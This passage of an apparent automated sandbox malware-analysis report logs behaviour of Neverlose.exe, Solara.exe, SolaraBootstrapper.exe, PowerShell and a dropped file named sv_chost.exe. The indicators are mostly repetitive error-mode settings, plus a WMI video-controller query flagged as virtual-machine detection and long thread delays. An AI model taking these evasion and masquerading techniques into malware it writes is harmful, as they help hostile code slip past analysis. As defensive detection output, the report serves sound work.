                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Neverlose.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeMemory allocated: 3920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeMemory allocated: 5920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeMemory allocated: 1B0D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 1120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 1120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeMemory allocated: E20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeMemory allocated: 1A9F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeMemory allocated: D60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeMemory allocated: 1A8E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeMemory allocated: 1240000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeMemory allocated: 1AE80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeMemory allocated: 730000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeMemory allocated: 1A580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeMemory allocated: BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeMemory allocated: 1A920000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Neverlose.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599312Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599091Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598970Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598730Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598616Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598495Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598351Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598168Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeThread delayed: delay time: 922337203685477
